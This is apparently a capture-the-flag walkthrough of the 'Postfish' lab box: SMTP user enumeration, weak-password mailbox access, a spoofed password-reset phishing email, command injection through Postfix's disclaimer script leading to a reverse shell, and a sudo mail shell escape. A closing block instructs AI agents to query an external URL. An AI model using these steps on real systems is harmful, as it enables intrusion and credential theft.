# Postfish added the IP and hostname to the hosts file for ease. `sudo nano /etc/hosts` I then ran nmap to see which ports were open. ``` $ sudo nmap -sC -Pn -p- postfish.offsec 1 тип Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST Nmap scan report for postfish.offsec (192.168.169.137) Host is up (0.062s latency). Not shown: 65528 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA) | 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA) |_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519) 25/tcp open smtp | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING |_ssl-date: TLS randomness does not represent time 80/tcp open http |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 |_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time 143/tcp open imap |_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time 993/tcp open imaps | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time |_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK 995/tcp open pop3s |_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds ``` I noticed we had a website running on port 80. It does not have much information but there is a team page. I have seen a couple of instances where some text in that page may be related to the user's password so I create a dictionary from this page through [cewl](/menu/tools-of-the-trade/cewl.md). ``` cewl http://postfish.off/team.html -m 5 -w team.txt ``` I use this custom dictionary and run it through smtp-user-enum to find available email accounts on the server. This shows us that we have sales and legal. ``` smtp-user-enum -U team.txt -t postfish.offsec Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... team.txt Target count ............. 1 Username count ........... 75 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Tue Dec 21 13:10:39 2021 ######### postfish.offsec: Sales exists postfish.offsec: Legal exists ######## Scan completed at Tue Dec 21 13:10:42 2021 ######### 2 results. 75 queries in 3 seconds (25.0 queries / sec) ``` I also take the team member's names and iterate through common email naming schemes and run this custom dictionary through smtp-user-enum as well. This confirms the accounts naming scheme. ``` smtp-user-enum -U users.lst -t postfish.offsec Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... users.lst Target count ............. 1 Username count ........... 40 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Tue Dec 21 11:57:31 2021 ######### postfish.offsec: claire.madison exists postfish.offsec: mike.ross exists postfish.offsec: brian.moore exists postfish.offsec: sarah.lorem exists postfish.offsec: claire.madison@postfish.off exists postfish.offsec: mike.ross@postfish.off exists postfish.offsec: brian.moore@postfish.off exists postfish.offsec: sarah.lorem@postfish.off exists ######## Scan completed at Tue Dec 21 11:57:33 2021 ######### 8 results. 40 queries in 2 seconds (20.0 queries / sec) ``` Trying the same username and password I see that sales has the password of sales as well. We use this information to find an email on their inbox about a password reset email that will be coming in the future. ``` curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales Return-Path: X-Original-To: sales@postfish.off Delivered-To: sales@postfish.off Received: by postfish.off (Postfix, from userid 997) id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC) Received: from x (localhost [127.0.0.1]) by postfish.off (Postfix) with SMTP id 7712145434 for ; Wed, 31 Mar 2021 13:11:23 +0000 (UTC) Subject: ERP Registration Reminder Message-Id: <20210331131139.7712145434@postfish.off> Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC) From: it@postfish.off Hi Sales team, We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system. Regards, IT ``` We send an email to the user with a link for them to reset their password. `sendemail -t brian.moore@postfish.off -f it@postfish.off -s postfish.off -u "Password Reset" -o tls=no` we get a call back with the user's password ![](/files/0urqmV4R4cAGqy2RzeeB) We can then login through ssh as brian ``` ssh brian.moore@postfish.off ``` Running LSE I notice a non-usual file that we have access to (`/etc/postfix/disclaimer`) Reading about this file and reading the other files called within it we can derive that these files add a disclaimer text to the outgoing emails from two accounts ( and ). With this information we can try a POC. I edit the /etc/postfix/disclaimer file and add the command ``` /usr/bin/ping -c 1 192.168.169.137 ``` and send an email to as we did before. As soon as I do, I get a ping packet on my machine (`sudo tcpdump ip proto \\icmp -i tun0`) Using this information we modify our file once more and do a reverse shell to our kali box. Now we have shell access, but this time as the 'filter' user. On here we see that `sudo -l` gives us sudo access to the `/usr/bin/mail`. Looking for 'mail' in [GTFObins](https://gtfobins.github.io/) we see how to take advantage of this command and easily privesc with `sudo mail --exec='!/bin/sh'` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.davila.me/menu/walkthroughs/oscp-practice/postfish.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.